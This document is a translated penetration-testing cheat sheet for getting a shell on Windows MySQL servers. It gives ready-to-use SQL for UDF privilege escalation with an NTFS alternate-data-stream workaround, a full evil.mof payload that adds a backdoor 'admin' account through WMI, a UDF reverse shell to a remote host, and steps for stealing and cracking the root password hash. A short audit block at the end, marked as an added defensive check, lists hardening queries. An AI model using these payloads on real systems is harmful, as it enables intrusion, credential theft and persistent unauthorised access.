MySQL Database Security
MySQL getshell
Obtaining the root password
- Look it up in the website's configuration files
- Download the /MysqlCurrentRoot/mysql/user.myd file, which stores the hashed root password, then read and crack it
1. UDF privilege escalation
- Create a function from the uploaded UDF dynamic link library
create function function_name returns string soname 'dll_path';
select function_name('execute cmd command or else');
drop function function_name;
delete from mysql.func where name='function_name';
- If "Can't open shared library" occurs, use an NTFS ADS (alternate data stream) to work around it:
a. Find the MySQL base directory: select @@basedir;
b. Use NTFS ADS to create the lib and plugin directories:
select 'dll_path' into dumpfile 'c:\Program Files\MYSQL\MySQL Server5.1\lib::$INDEX_ALLOCATION';
select 'dll_path' into dumpfile 'c:\Program Files\MYSQL\MySQL Server5.1\lib\plugin::$INDEX_ALLOCATION';
- If the MySQL version is greater than 5.1, UDF.dll must be placed in the lib\plugin folder under the MySQL installation directory
- If the MySQL version is lower than 5.1, UDF.dll is placed in:
Windows Server 2003: c:\windows\system32
Windows Server 2000: c:\winnt\system32
2. MOF privilege escalation
a. Upload evil.mof
b. Export the file to the correct location
select load_file('uploaded evil.mof') into dumpfile 'c:\windows\system32\wbem\mof\evil.mof';
/*--------------------evil.mof-----------------*/
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
3. Privilege escalation via a UDF reverse shell
create function reverseshell returns string soname 'evil.dll';
select reverseshell(remoteip, port);
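As an added defender-side check (not part of the original page), the following queries tell a DBA whether a server still meets the preconditions that both the UDF path and the MOF write above depend on: unrestricted dumpfile writes, a writable plugin directory, and accounts holding FILE. The allow-list entry in query 4 is an assumed placeholder.

```sql
-- Added audit queries; not from the original page. Run as a DBA.

-- 1. Where may `SELECT ... INTO DUMPFILE` / `LOAD_FILE()` touch the file system?
--    ''   = anywhere (the weak setting every step above relies on)
--    NULL = import/export disabled (hardened: secure_file_priv=NULL in my.cnf)
--    path = restricted to that one directory
SHOW VARIABLES LIKE 'secure_file_priv';

-- 2. Where would a UDF library have to land on MySQL >= 5.1?
--    This directory must not be writable by the account mysqld runs as.
SHOW VARIABLES LIKE 'plugin_dir';

-- 3. Which accounts hold FILE at all? Only these can use dumpfile/load_file,
--    so the web application's account should not appear here.
SELECT user, host FROM mysql.user WHERE File_priv = 'Y';

-- 4. Are there registered UDFs that are not on the approved list?
--    'expected_udf_1' is a placeholder; replace with your known-good names.
SELECT name, ret, dl, type
FROM   mysql.func
WHERE  name NOT IN ('expected_udf_1');

-- 5. Unregister an unexpected UDF (drop removes its mysql.func row as well).
-- DROP FUNCTION IF EXISTS unexpected_udf;

-- Note for the MOF step: writing into c:\windows\system32\wbem\mof only works
-- when mysqld itself runs as SYSTEM. Running the service as a dedicated
-- low-privilege account removes that write path regardless of FILE grants.
```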